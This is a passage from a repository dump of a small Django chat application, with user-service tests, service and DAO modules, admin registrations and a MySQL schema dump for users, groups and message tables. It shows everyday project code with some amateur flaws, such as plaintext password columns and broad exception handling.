"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom adam2014.Service.UserService import *\nfrom adam2014.models import User\nfrom adam2014.models import Group\nfrom adam2014.models import GroupRelation\nimport datetime\nimport django.db.transaction\n\nclass UserServiceTest(TestCase):\n def setUp(self):\n #构造user\n self.user = {\"id\":1,\"password\":\"7654321\",\"nickname\":\"frank\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n self.user2 = {\"id\":2,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111112\"}\n self.user3 = {\"id\":3,\"password\":\"1234567\",\"nickname\":\"frank2\",\"photo\":\"this is a photo\",\"phone\":\"13570517279\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111113\"}\n User.objects.create(**self.user)\n User.objects.create(**self.user2)\n User.objects.create(**self.user3)\n\n #构造两个小组\n self.group1 = {\"id\":1,\"name\":\"groupA\",\"ucount\":1,\"code\":\"535676\",\"creater_id\":1}\n self.group2 = {\"id\":2,\"name\":\"groupB\",\"ucount\":1,\"code\":\"155212\",\"creater_id\":2}\n Group.objects.create(**self.group1)\n Group.objects.create(**self.group2)\n\n #将user1 user2分别加到group1 和 group2\n self.time = datetime.datetime.now()\n self.grouprelation1 = {\"user_id\":1,\"group_id\":1,\"time\":str(self.time)}\n self.grouprelation2 = {\"user_id\":1,\"group_id\":2,\"time\":str(self.time)}\n self.grouprelation3 = {\"user_id\":2,\"group_id\":1,\"time\":str(self.time)}\n self.grouprelation4 = {\"user_id\":2,\"group_id\":2,\"time\":str(self.time)}\n GroupRelation.objects.create(**self.grouprelation1)\n GroupRelation.objects.create(**self.grouprelation2)\n GroupRelation.objects.create(**self.grouprelation3)\n GroupRelation.objects.create(**self.grouprelation4)\n\n\n def testNewUser(self):\n user4 = {\"id\":4,\"password\":\"12306666\",\"nickname\":\"wudage\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n before = len(User.objects.all())\n print(\"testNewUserbefore:\")\n print(User.objects.all())\n newUser(**user4)\n after = len(User.objects.all())\n print(\"testNewUserafter after:\")\n print(User.objects.all())\n self.assertEqual(after-before,1)\n # 测试except情况,主键重复\n user5 = {\"id\":3,\"password\":\"12306666\",\"nickname\":\"wudage\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n print(\"testNewUser failed because the primary key: \")\n with transaction.atomic():\n u = newUser(**user5)\n self.assertEqual(u,'error')\n print(User.objects.all())\n\n\n def testGetUserById(self):\n self.assertEqual(getUserById(1).id,1)\n self.assertEqual(getUserById(2).id,2)\n #测试except情况,不存在的id\n self.assertEqual(getUserById(4),None)\n self.assertEqual(getUserById(5),None)\n\n def testGetUserByCode(self):\n self.assertEqual(getUserByCode(111111111).id,1)\n self.assertEqual(getUserByCode(111111112).id,2)\n #测试except情况,不存在的code\n self.assertEqual(getUserById(535676766),None)\n self.assertEqual(getUserById(535676777),None)\n\n def testUpdateUser(self):\n user = {\"id\":1,\"password\":\"12306666\",\"nickname\":\"ChenFeng\",\"photo\":\"this is a photo\",\"phone\":\"13570517278\",\n \"contacts_version\":\"1.0\",\"longitude\":\"1.23\",\"latitude\":\"23.45\",\"code\":\"111111111\"}\n print(\"testUpdateUserbefore:frank\")\n print(getUserById(1))\n updateUser(**user)\n print(\"testUpdateUserafter:ChenFeng\")\n print(getUserById(1))\n self.assertEqual(getUserById(1).nickname,\"ChenFeng\")\n\n def testGetUser_Groups(self):\n user1_groups = getUser_Groups(1)\n user2_groups = getUser_Groups(2)\n print(\"testGetUser_Groups:user1_groups\"+str(len(user1_groups)))\n print(user1_groups)\n print(\"testGetUser_Groups:user2_groups\"+str(len(user2_groups)))\n print(user2_groups)\n print(\"testGetUser_Groups: no userid == 4\")\n user0_groups = getUser_Groups(4)\n self.assertEqual(user0_groups,None)\n print(user0_groups)\n print(\"testGetUser_Groups: userid=3,no groups\")\n user00_groups = getUser_Groups(3)\n print(user00_groups)\n\n\n def testGetUser_GroupsByCondition(self):\n self.group1 = {\"code\":\"535676\"}\n self.group2 = {\"code\":\"135604\"}\n user1_groups = getUser_GroupsByCondition(1,**self.group1)\n user2_groups = getUser_GroupsByCondition(2,**self.group2)\n print(\"testGetUser_GroupsByCondition:\")\n print(user1_groups)\n self.assertEqual(len(user2_groups),0)\n print(user2_groups)\n\n def testDeleteUser(self):\n deleteUser(1)\n deleteUser(2)\n print(\"testDeleteUser1&User2:\")\n print(User.objects.all())\n self.assertEqual(len(User.objects.filter(id=1)),0)\n self.assertEqual(len(User.objects.filter(id=2)),0)\n print(\"testDeleteUser: no userid == 4\")\n self.assertEqual(deleteUser(4),'error')\n print(User.objects.all())\n\n"
},
{
"alpha_fraction": 0.7232796549797058,
"alphanum_fraction": 0.7349926829338074,
"avg_line_length": 25.30769157409668,
"blob_id": "49b11b3f7aaf929fc1d9390f9459c24d0b734def",
"content_id": "c12119a86e0916b96c00e772ef6f1e2ec8726876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 683,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 26,
"path": "/zzc/adam2014/DAO/PictureMessageDAO.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'lao605'\n# -*- coding: utf-8 -*-\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import PictureMessage\n# class PictureMessage(models.Model):\n# message = models.ForeignKey(Message,null=True)\n# content = models.TextField()\n\ndef insertPictureMessage(**pictureMessage):\n p = PictureMessage.objects.create(**pictureMessage)\n return p;\n\ndef deletePictureMessage(id):\n PictureMessage.objects.get(id=id).delete()\n\ndef getPictureMessageById(id):\n return PictureMessage.objects.get(id=id)\n\ndef updatePictureMessage(**kw):\n PictureMessage.objects.filter(id=kw['id']).update(**kw)"
},
{
"alpha_fraction": 0.6239687204360962,
"alphanum_fraction": 0.6326530575752258,
"avg_line_length": 17.399999618530273,
"blob_id": "9ed3ed6817a5b15153da54e31cf463c200c83459",
"content_id": "acb0ea46d880a93ae862df8747f3b06f3c523b7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2515,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 125,
"path": "/zzc/adam2014/Service/UserService.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'CF'\n# -*- coding: utf-8 -*-\n\n# Service,业务逻辑层,接受来自action过滤后合法的数据,调用不同的DAO来完成业务逻辑。\n# ① Service应该封装DAO的增删查改等接口\n# ②根据业务需求增加一定的接口,一定的事务处理: 单个表的操作只用try except,多个表操作且设计到数据一致性时\n#需要添加事务\n# ③ try except 异常处理\n\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"zzc.settings\")\n\nimport django\ndjango.setup()\n\nfrom adam2014.models import Group\nfrom adam2014.models import User\nfrom adam2014.DAO import UserDAO\nfrom django.db import IntegrityError, transaction\n\n# Joe test for git555\n\n\ndef newUser(**user):\n try:\n u = UserDAO.insertUser(**user)\n except:\n return \"error\"\n return u\n\n\ndef deleteUser(id):\n try:\n UserDAO.deleteUser(id)\n except:\n return \"error\"\n return 'success'\n\n\ndef getUserById(id):\n u = None\n try:\n u = UserDAO.getUserById(id)\n except:\n pass\n return u\n\n\ndef getUserByCode(code):\n u = None\n try:\n u = UserDAO.getUserByCode(code)\n except:\n pass\n return u\n\n\ndef getUserByPhone(phone):\n u = None\n try:\n u = UserDAO.getUserByPhone(phone)\n except:\n pass\n return u\n\ndef updateUser(**user):\n try:\n UserDAO.updateUser(**user)\n except:\n return 'error'\n return 'success'\n\n\ndef getUser_Groups(id):\n groups = None\n try:\n groups = User.objects.get(id=id).group_set.all()\n except:\n pass\n return groups\n\ndef getUser_GroupsByCondition(id,**group):\n groups = None\n try:\n groups = User.objects.get(id=id).group_set.filter(**group)\n except:\n pass\n return groups\n\ndef getuser_Groups(id):\n groups = getUser_Groups(id)\n if (groups == None):\n return 'error'\n elif (len(groups)==0):\n return 'empty list'\n else:\n return groups\n\ndef validateUserByPhone(phone,password):\n user = False\n try:\n user = UserDAO.validateUserByPhone(phone,password)\n except:\n pass\n return user\n\ndef validateUserByCode(code,password):\n user = False\n try:\n user = UserDAO.validateUserByPhone(code,password)\n except:\n pass\n return user\n\n# 待补充\ndef validateVersion(version):\n\tUserDAO.validateVersion()\n\ndef validateExistPhone(phone):\n user = False\n try:\n user = UserDAO.validateExistPhone(phone)\n except:\n pass\n return user\n\n\n\n"
},
{
"alpha_fraction": 0.8326995968818665,
"alphanum_fraction": 0.8403041958808899,
"avg_line_length": 28.27777862548828,
"blob_id": "8c8c9925e854cfaf4d56958ff1e096729f6625b9",
"content_id": "08cbc6f2baa257fbb1682c7d29ee84c11d3a4aa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 526,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 18,
"path": "/zzc/adam2014/admin.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom adam2014.models import *\n\nadmin.site.register(User)\nadmin.site.register(Group)\nadmin.site.register(Message)\nadmin.site.register(TextMessage)\nadmin.site.register(PictureMessage)\nadmin.site.register(VoiceMessage)\nadmin.site.register(LocationMessage)\nadmin.site.register(BottlePicture)\nadmin.site.register(ImmediatelyMessage)\nadmin.site.register(AddFriend)\nadmin.site.register(FriendRelation)\nadmin.site.register(GroupRelation)\nadmin.site.register(GroupMessage)"
},
{
"alpha_fraction": 0.5393133759498596,
"alphanum_fraction": 0.5404208302497864,
"avg_line_length": 35.15999984741211,
"blob_id": "21d0605ed7356e4abd144a9b373b77a96ddef41e",
"content_id": "2a1871e977357939f6a4e6f64d840729daf34a86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 903,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 25,
"path": "/zzc/adam2014/JoinModels/Group_user.py",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "__author__ = 'user'\nclass Group_user(object):\n def __init__(self,id,time,userid,nickname,longitude,latitude,code,photo,phone):\n self.id = id\n self.time = time\n self.userid = userid\n self.nickname = nickname\n self.longitude = longitude\n self.latitude = latitude\n self.code = code\n self.photo = photo\n self.phone = phone\n\n def printout(self):\n print(\"id: \"+str(self.id)+\" time \"+str(self.time)\n +\" userid: \"+str(self.userid)+\" nickname: \"+str(self.nickname)\n +\" longitude: \"+str(self.longitude)+' latitude: '+str(self.latitude)\n + 'code : '+str(self.code)+\" photo:\"+str(self.photo)+\" phone: \"+str(self.phone))\n\n def object2dict(obj):\n d = {}\n #d['__class__'] = obj.__class__.__name__\n #d['__module__'] = obj.__module__\n d.update(obj.__dict__)\n return d"
},
{
"alpha_fraction": 0.5782706141471863,
"alphanum_fraction": 0.6305187940597534,
"avg_line_length": 44.93457794189453,
"blob_id": "6dd08241e19c1b40c421b270eb1017e36011885c",
"content_id": "d843e7e48bded97a24584b4ec3811b0189e3a7ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 24575,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 535,
"path": "/sql版本/2014.11.11-adam2014.CCCube.sql",
"repo_name": "lao605/zzc",
"src_encoding": "UTF-8",
"text": "/*\nNavicat MySQL Data Transfer\n\nSource Server : local\nSource Server Version : 50610\nSource Host : localhost:3306\nSource Database : adam2014\n\nTarget Server Type : MYSQL\nTarget Server Version : 50610\nFile Encoding : 65001\n\nDate: 2014-11-11 14:08:57\n*/\n\nSET FOREIGN_KEY_CHECKS=0;\n\n-- ----------------------------\n-- Table structure for adam2014_addfriend\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_addfriend`;\nCREATE TABLE `adam2014_addfriend` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_to_id` int(11) NOT NULL,\n `time` datetime NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_addfriend_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_addfriend_user_from_id_64ec19e9_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_addfriend\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_bottlepicture\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_bottlepicture`;\nCREATE TABLE `adam2014_bottlepicture` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `usedTimes` int(11) NOT NULL,\n `tookTime` datetime NOT NULL,\n `author` varchar(32) DEFAULT NULL,\n `content` longtext NOT NULL,\n `longitude` decimal(8,5) DEFAULT NULL,\n `latitude` decimal(8,5) DEFAULT NULL,\n `user_id` int(11),\n PRIMARY KEY (`id`),\n KEY `adam2014_bottlepicture_e8701ad4` (`user_id`),\n CONSTRAINT `adam2014_bottlepicture_user_id_3dc400d6_fk_adam2014_user_id` FOREIGN KEY (`user_id`) REFERENCES `adam2014_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_bottlepicture\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_friendrelation\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_friendrelation`;\nCREATE TABLE `adam2014_friendrelation` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_to_id` int(11) NOT NULL,\n `time` datetime NOT NULL,\n `inBlackList` tinyint(1) NOT NULL,\n `remark` varchar(16) NOT NULL,\n `top` tinyint(1) NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_friendrelation_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_friendrelatio_user_from_id_794f0ef3_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_friendrelation\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_group\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_group`;\nCREATE TABLE `adam2014_group` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(32) NOT NULL,\n `ucount` int(11) NOT NULL,\n `code` varchar(20) NOT NULL,\n `creater_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_group\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_groupmessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_groupmessage`;\nCREATE TABLE `adam2014_groupmessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `time` datetime NOT NULL,\n `group_to_id` int(11) NOT NULL,\n `message_id` int(11) NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_groupmessage_32a1321c` (`group_to_id`),\n KEY `adam2014_groupmessage_4ccaa172` (`message_id`),\n KEY `adam2014_groupmessage_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_groupmessage_user_from_id_546b0f2b_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`),\n CONSTRAINT `adam2014_groupmessage_group_to_id_19c19ac3_fk_adam2014_group_id` FOREIGN KEY (`group_to_id`) REFERENCES `adam2014_group` (`id`),\n CONSTRAINT `adam2014_groupmessage_message_id_30b70d94_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_groupmessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_grouprelation\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_grouprelation`;\nCREATE TABLE `adam2014_grouprelation` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `time` datetime NOT NULL,\n `group_id` int(11) NOT NULL,\n `user_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_grouprelation_0e939a4f` (`group_id`),\n KEY `adam2014_grouprelation_e8701ad4` (`user_id`),\n CONSTRAINT `adam2014_grouprelation_user_id_77cf4e6d_fk_adam2014_user_id` FOREIGN KEY (`user_id`) REFERENCES `adam2014_user` (`id`),\n CONSTRAINT `adam2014_grouprelation_group_id_7bea8234_fk_adam2014_group_id` FOREIGN KEY (`group_id`) REFERENCES `adam2014_group` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_grouprelation\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_immediatelymessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_immediatelymessage`;\nCREATE TABLE `adam2014_immediatelymessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_to_id` int(11) NOT NULL,\n `time` datetime NOT NULL,\n `message_id` int(11) NOT NULL,\n `user_from_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_immediatelymessage_4ccaa172` (`message_id`),\n KEY `adam2014_immediatelymessage_e1e8addb` (`user_from_id`),\n CONSTRAINT `adam2014_immediatelyme_user_from_id_3cba2104_fk_adam2014_user_id` FOREIGN KEY (`user_from_id`) REFERENCES `adam2014_user` (`id`),\n CONSTRAINT `adam2014_immediatelym_message_id_57ccd623_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_immediatelymessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_locationmessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_locationmessage`;\nCREATE TABLE `adam2014_locationmessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11),\n PRIMARY KEY (`id`),\n KEY `adam2014_locationmessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_locationmess_message_id_623c8639_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_locationmessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_message\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_message`;\nCREATE TABLE `adam2014_message` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `time` datetime NOT NULL,\n `type` int(11) NOT NULL,\n `content_id` int(11) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_message\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_picturemessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_picturemessage`;\nCREATE TABLE `adam2014_picturemessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_picturemessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_picturemessa_message_id_21d43d2f_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_picturemessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_textmessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_textmessage`;\nCREATE TABLE `adam2014_textmessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_textmessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_textmessage_message_id_4381e645_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_textmessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_user\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_user`;\nCREATE TABLE `adam2014_user` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `password` varchar(16) NOT NULL,\n `nickname` varchar(32) NOT NULL,\n `photo` longtext NOT NULL,\n `phone` varchar(16) NOT NULL,\n `contacts_version` varchar(15) DEFAULT NULL,\n `longitude` decimal(8,5) DEFAULT NULL,\n `latitude` decimal(8,5) DEFAULT NULL,\n `code` varchar(20) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_user\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for adam2014_voicemessage\n-- ----------------------------\nDROP TABLE IF EXISTS `adam2014_voicemessage`;\nCREATE TABLE `adam2014_voicemessage` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `content` longtext NOT NULL,\n `message_id` int(11) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `adam2014_voicemessage_4ccaa172` (`message_id`),\n CONSTRAINT `adam2014_voicemessage_message_id_65e66fe1_fk_adam2014_message_id` FOREIGN KEY (`message_id`) REFERENCES `adam2014_message` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of adam2014_voicemessage\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_group\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_group`;\nCREATE TABLE `auth_group` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(80) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `name` (`name`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_group\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_group_permissions\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_group_permissions`;\nCREATE TABLE `auth_group_permissions` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `group_id` int(11) NOT NULL,\n `permission_id` int(11) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `group_id` (`group_id`,`permission_id`),\n KEY `auth_group_permissions_0e939a4f` (`group_id`),\n KEY `auth_group_permissions_8373b171` (`permission_id`),\n CONSTRAINT `auth_group_permissi_permission_id_23962d04_fk_auth_permission_id` FOREIGN KEY (`permission_id`) REFERENCES `auth_permission` (`id`),\n CONSTRAINT `auth_group_permissions_group_id_58c48ba9_fk_auth_group_id` FOREIGN KEY (`group_id`) REFERENCES `auth_group` (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_group_permissions\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for auth_permission\n-- ----------------------------\nDROP TABLE IF EXISTS `auth_permission`;\nCREATE TABLE `auth_permission` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(50) NOT NULL,\n `content_type_id` int(11) NOT NULL,\n `codename` varchar(100) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `content_type_id` (`content_type_id`,`codename`),\n KEY `auth_permission_417f1b1c` (`content_type_id`),\n CONSTRAINT `auth_permissi_content_type_id_51277a81_fk_django_content_type_id` FOREIGN KEY (`content_type_id`) REFERENCES `django_content_type` (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=58 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of auth_permission\n-- ----------------------------\nINSERT INTO `auth_permission` VALUES ('1', 'Can add log entry', '1', 'add_logentry');\nINSERT INTO `auth_permission` VALUES ('2', 'Can change log entry', '1', 'change_logentry');\nINSERT INTO `auth_permission` VALUES ('3', 'Can delete log entry', '1', 'delete_logentry');\nINSERT INTO `auth_permission` VALUES ('4', 'Can add permission', '2', 'add_permission');\nINSERT INTO `auth_permission` VALUES ('5', 'Can change permission', '2', 'change_permission');\nINSERT INTO `auth_permission` VALUES ('6', 'Can delete permission', '2', 'delete_permission');\nINSERT INTO `auth_permission` VALUES ('7', 'Can add group', '3', 'add_group');\nINSERT INTO `auth_permission` VALUES ('8', 'Can change group', '3', 'change_group');\nINSERT INTO `auth_permission` VALUES ('9', 'Can delete group', '3', 'delete_group');\nINSERT INTO `auth_permission` VALUES ('10', 'Can add user', '4', 'add_user');\nINSERT INTO `auth_permission` VALUES ('11', 'Can change user', '4', 'change_user');\nINSERT INTO `auth_permission` VALUES ('12', 'Can delete user', '4', 'delete_user');\nINSERT INTO `auth_permission` VALUES ('13', 'Can add content type', '5', 'add_contenttype');\nINSERT INTO `auth_permission` VALUES ('14', 'Can change content type', '5', 'change_contenttype');\nINSERT INTO `auth_permission` VALUES ('15', 'Can delete content type', '5', 'delete_contenttype');\nINSERT INTO `auth_permission` VALUES ('16', 'Can add session', '6', 'add_session');\nINSERT INTO `auth_permission` VALUES ('17', 'Can change session', '6', 'change_session');\nINSERT INTO `auth_permission` VALUES ('18', 'Can delete session', '6', 'delete_session');\nINSERT INTO `auth_permission` VALUES ('19', 'Can add user', '7', 'add_user');\nINSERT INTO `auth_permission` VALUES ('20', 'Can change user', '7', 'change_user');\nINSERT INTO `auth_permission` VALUES ('21', 'Can delete user', '7', 'delete_user');\nINSERT INTO `auth_permission` VALUES ('22', 'Can add group', '8', 'add_group');\nINSERT INTO `auth_permission` VALUES ('23', 'Can change group', '8', 'change_group');\nINSERT INTO `auth_permission` VALUES ('24', 'Can delete group', '8', 'delete_group');\nINSERT INTO `auth_permission` VALUES ('25', 'Can add message', '9', 'add_message');\nINSERT INTO `auth_permission` VALUES ('26', 'Can change message', '9', 'change_message');\nINSERT INTO `auth_permission` VALUES ('27', 'Can delete message', '9', 'delete_message');\nINSERT INTO `auth_permission` VALUES ('28', 'Can add text message', '10', 'add_textmessage');\nINSERT INTO `auth_permission` VALUES ('29', 'Can change text message', '10', 'change_textmessage');\nINSERT INTO `auth_permission` VALUES ('30', 'Can delete text message', '10', 'delete_textmessage');\nINSERT INTO `auth_permission` VALUES ('31', 'Can add picture message', '11', 'add_picturemessage');\nINSERT INTO `auth_permission` VALUES ('32', 'Can change picture message', '11', 'change_picturemessage');\nINSERT INTO `auth_permission` VALUES ('33', 'Can delete picture message', '11', 'delete_picturemessage');\nINSERT INTO `auth_permission` VALUES ('34', 'Can add voice message', '12', 'add_voicemessage');\nINSERT INTO `auth_permission` VALUES ('35', 'Can change voice message', '12', 'change_voicemessage');\nINSERT INTO `auth_permission` VALUES ('36', 'Can delete voice message', '12', 'delete_voicemessage');\nINSERT INTO `auth_permission` VALUES ('37', 'Can add location message', '13', 'add_locationmessage');\nINSERT INTO `auth_permission` VALUES ('38', 'Can change location message', '13', 'change_locationmessage');\nINSERT INTO `auth_permission` VALUES ('39', 'Can delete location message', '13', 'delete_locationmessage');\nINSERT INTO `auth_permission` VALUES ('40', 'Can add bottle picture', '14', 'add_bottlepicture');\nINSERT INTO `auth_permission` VALUES ('41', 'Can change bottle picture', '14', 'change_bottlepicture');\nINSERT INTO `auth_permission` VALUES ('42', 'Can delete bottle picture', '14', 'delete_bottlepicture');\nINSERT INTO `auth_permission` VALUES ('43', 'Can add immediately message', '15', 'add_immediatelymessage');\nINSERT INTO `auth_permission` VALUES ('44', 'Can change immediately message', '15', 'change_immediatelymessage');\nINSERT INTO `auth_permission` VALUES ('45', 'Can delete immediately message', '15', 'delete_immediatelymessage');\nINSERT INTO `auth_permission` VALUES ('46', 'Can add add friend', '16', 'add_addfriend');\nINSERT INTO `auth_permission` VALUES ('47', 'Can change add friend', '16', 'change_addfriend');\nINSERT INTO `auth_permission` VALUES ('48', 'Can delete add friend', '16', 'delete_addfriend');\nINSERT INTO `auth_permission` VALUES ('49', 'Can add friend relation', '17', 'add_friendrelation');\nINSERT INTO `auth_permission` VALUES ('50', 'Can change friend relation', '17', 'change_friendrelation');\nINSERT INTO `auth_permission` VALUES ('51', 'Can delete friend relation', '17', 'delete_friendrelation');\nINSERT INTO `auth_permission` VALUES ('52', 'Can add group relation', '18', 'add_grouprelation');\nINSERT INTO `auth_permission` VALUES ('53', 'Can change group relation', '18', 'change_grouprelation');\nINSERT INTO `auth_permission` VALUES ('54', 'Can delete group relation', '18', 'delete_grouprelation');\nINSERT INTO `auth_permission` VALUES ('55', 'Can add group message', '19', 'add_groupmessage');\nINSERT INTO `auth_permission` VALUES ('56', 'Can change group message', '19', 'change_groupmessage');\nINSERT INTO `auth_permission` VALUES ('57', 'Can delete group message', '19', 'delete_groupmessage');\n\n-- ----------------------------\n-- Table structure for 